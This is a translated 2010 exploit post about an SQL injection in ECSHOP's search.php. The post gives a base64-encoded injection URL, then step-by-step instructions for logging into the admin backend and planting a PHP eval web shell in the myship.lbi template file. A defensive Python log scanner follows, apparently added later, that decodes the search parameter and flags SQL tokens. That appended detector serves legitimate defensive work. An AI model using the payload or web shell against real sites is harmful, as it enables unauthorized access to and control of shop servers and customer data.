ECSHOP search injection vulnerability: using the exp and taking a shell from the backend - Vulnerability Warning - Black Bar Safety Net

2010-08-02T00:00:00
ID MYHACK58:62201027762
Type myhack58
Reporter Anonymous
Modified 2010-08-02T00:00:00

Description

This is a variant of the search.php exp: search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxmju6ijenksbhbmqgmt0yiedst1vqiejzigdvb2rzx2lkihvuaw9uigfsbcbzzwxly3qgy29uy2f0khvzzxjfbmftzswwednhlhbhc3n3b3jklccixccpihvuaw9uihnlbgvjdcaxiyinkswxigzyb20gzwnzx2fkbwlux3vzzxijijtzoje6ijeio319

Taking a shell: log in to the backend at /admin/ with the username and password, go to module management - library management, select myship.lbi and insert <?php eval($_REQUEST['cmd'])?>

Connect to http://www.. net/myship.php*word

I injected my way into a backend and then followed the steps to see whether it would succeed. The steps are as follows:

After clicking OK, visit http://www.. net/myship.php* and see how the page has changed. I then used lake2's dual-use one-liner and, sure enough, the connection was successful, as shown in the figure:

The principle behind this method is said to be that ECSHOP's smarty template mechanism allows PHP code to be executed directly, which gives rise to the vulnerability. I don't understand smarty at all, but I will try it.

This method is really good; once again I have picked up a technique from the experts. I found nothing online that improves on this method, so having seen it, I am sharing it.
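For defenders reviewing web logs after this advisory, the following added example (not part of the original post and not ECSHOP code) decodes the `encode` parameter of search.php requests and flags values that carry SQL syntax. It assumes combined-format access logs; the sample lines, the benign filter contents and the SQL token list are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

# SQL syntax that has no place in a serialized search filter (illustrative list).
SQL_TOKENS = re.compile(
    rb"union\s+(all\s+)?select|select\b.+\bfrom\b|concat\s*\(|/\*|--\s", re.I | re.S)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_param(value):
    """Base64-decode a query value, tolerating stripped padding; None if invalid."""
    value = value.replace(" ", "+")          # parse_qs turns '+' into a space
    value += "=" * (-len(value) % 4)         # restore padding dropped in transit
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None

def classify(line):
    """Return (verdict, decoded_bytes) for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return ("ignore", None)
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/search.php"):
        return ("ignore", None)
    values = parse_qs(url.query, keep_blank_values=True).get("encode")
    if not values:
        return ("ignore", None)
    decoded = decode_param(values[0])
    if decoded is None:
        return ("malformed", None)           # worth a look: probing or fuzzing
    if SQL_TOKENS.search(decoded):
        return ("suspicious", decoded)
    return ("ok", decoded)

def make_line(plain):
    """Build a constructed log line whose encode value is base64(plain)."""
    token = base64.b64encode(plain).decode().rstrip("=")
    return ('203.0.113.7 - - [02/Aug/2010:10:00:00 +0800] '
            f'"GET /search.php?encode={token} HTTP/1.1" 200 512')

# Constructed sample input: benign filter, SQL-bearing filter, junk value, other page.
SAMPLE_LOG = [
    make_line(b'a:1:{s:8:"keywords";s:5:"phone";}'),
    make_line(b'a:1:{s:4:"attr";a:1:{s:27:"1 union select PLACEHOLDER#";s:1:"1";}}'),
    '203.0.113.7 - - [02/Aug/2010:10:00:05 +0800] "GET /search.php?encode=%25%25 HTTP/1.1" 200 512',
    '203.0.113.9 - - [02/Aug/2010:10:00:09 +0800] "GET /index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(classify(entry)[0], entry[:60])
```

A "suspicious" hit on search.php is a reason to review the admin accounts and to diff the template library files (such as myship.lbi) against a known-good copy for embedded PHP.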